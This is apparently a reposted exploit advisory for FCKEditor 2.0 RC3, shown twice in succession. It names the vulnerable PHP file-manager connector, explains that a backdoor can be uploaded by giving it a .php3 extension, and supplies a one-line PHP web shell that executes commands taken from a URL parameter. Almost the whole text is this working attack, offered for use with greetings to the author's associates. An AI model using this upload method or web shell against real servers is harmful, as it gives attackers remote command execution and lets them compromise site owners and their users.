FCKEditor Shell Upload Exploit
웹/공격 2010. 3. 17. 11:17 |FCKEditor Shell Upload Exploit
------------------------------
Web-App: FCKEditor.
Version: Version 2.0 RC3 (Release Candidate 3).
Link : http://sourceforge.net/projects/fckeditor/files/FCKeditor/
Author : Aodrulez.
Email : f3arm3d3ar@gmail.com
Vulnerable File :
-----------------
http://127.0.0.1/editor/filemanager/browser/default/connectors/php/connector.php
Vulnerable Link :
-----------------
http://127.0.0.1/editor/filemanager/browser/default/browser.html?Connector=/editor/filemanager/browser/default/connectors/php/connector.php
Exploit :
---------
You can upload a php backdoor with this
extension: .php3
Sample Backdoor:(save as "any_name.php3")
-----------------------------------------
<? system($_GET["cmd"]); ?>
Greetz Fly Out To :
-------------------
Amforked() : My Mentor.
The Blue Genius : My Boss.
str0ke : Tnx a Ton 4 everythin!
www.orchidseven.com
www.isac.org.in
------------------------------
Web-App: FCKEditor.
Version: Version 2.0 RC3 (Release Candidate 3).
Link : http://sourceforge.net/projects/fckeditor/files/FCKeditor/
Author : Aodrulez.
Email : f3arm3d3ar@gmail.com
Vulnerable File :
-----------------
http://127.0.0.1/editor/filemanager/browser/default/connectors/php/connector.php
Vulnerable Link :
-----------------
http://127.0.0.1/editor/filemanager/browser/default/browser.html?Connector=/editor/filemanager/browser/default/connectors/php/connector.php
Exploit :
---------
You can upload a php backdoor with this
extension: .php3
Sample Backdoor:(save as "any_name.php3")
-----------------------------------------
<? system($_GET["cmd"]); ?>
Greetz Fly Out To :
-------------------
Amforked() : My Mentor.
The Blue Genius : My Boss.
str0ke : Tnx a Ton 4 everythin!
www.orchidseven.com
www.isac.org.in